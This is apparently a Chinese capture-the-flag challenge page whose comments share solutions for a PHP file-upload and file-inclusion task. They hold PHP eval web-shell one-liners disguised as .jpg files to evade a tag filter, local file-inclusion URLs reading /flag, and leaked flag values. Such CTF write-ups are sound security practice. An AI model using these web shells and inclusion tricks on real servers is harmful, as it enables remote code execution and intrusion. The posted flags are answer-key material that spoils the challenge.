评分(5)
解题动态
1293273679 攻破了该题 15小时前
xjn12 攻破了该题 15小时前
18273414848 攻破了该题 22小时前
liberator 攻破了该题 1天前
liutianhao 攻破了该题 1天前
aaa1 攻破了该题 1天前
wangheng 攻破了该题 1天前
Oliver23 攻破了该题 1天前
daimaojiang 攻破了该题 1天前
l2 攻破了该题 2天前
easier 攻破了该题 2天前
sdxsdxl 攻破了该题 3天前
Ivy 攻破了该题 3天前
vsk666 攻破了该题 3天前
juedai 攻破了该题 3天前
xiaomiao123 攻破了该题 4天前
YangZoe 攻破了该题 7天前
destiny7v 攻破了该题 7天前
yy_hc 攻破了该题 8天前
评论
yanqiye 1年前
举报
用file=/flag取巧做法,真正做题名字肯定要变,预期做法:传一句话,发现php标签被删了,直接用<?= @eval($_POST[1]);就可以了。
G3tcH4r 1年前
举报
花金币看了WP,不过自己试了下,发现script 设置language为php,也可以传能执行命令的马儿,这题蛮有意思
迷茫的三千面 1年前
举报
flag{414a91ba57a5e0b5a4eb725b75f5030e}
hao7 1年前
举报
flag{69fc76f3ef98a524a3ef56977fc02278}
CHLing 1年前
举报
http://114.67.175.224:18550/index.php?file=//flag
qiusheng 1年前
举报
1、找到文件包含的路径XXXindex.php?file=upload.php;上传一句话木马(格式保存为jpg)<script language="php">@eval($_POST[cmd])</script> 2、上传完成后访问上传的路径看是否成功。XXX/index.php?file=upload/xxx.jpg 3、用蚁剑连接,url是XX
xiaoxiao972521 1年前
举报
虽然index.php?file=/flag 就出来了,但是依旧执着的绕过了upload.php
冯飞99 1年前
举报
绕来绕去看到你的评论一把过
zzccbb2005 2年前
举报
http://114.67.175.224:10017/index.php?file=file:///flag flag{27d76583b9a54c6ef8af91f66855ac12}
109张某 2年前
举报
这个题一句话传好像有些问题,我传了一堆,就只有下面仁兄的file:///flag方法成功了
asd+1024 1年前
举报
传木马的话,用<script language='php'>@eval($_POST['asd']);</script>然后,文件格式.jpg,在文件包含就可以了,file:///flag确实简单
不会编程的崽 2年前
举报
<?php>被过滤了,用这个<script language="php">@eval($_POST['attack'])</script>绕过,然后文件包含即可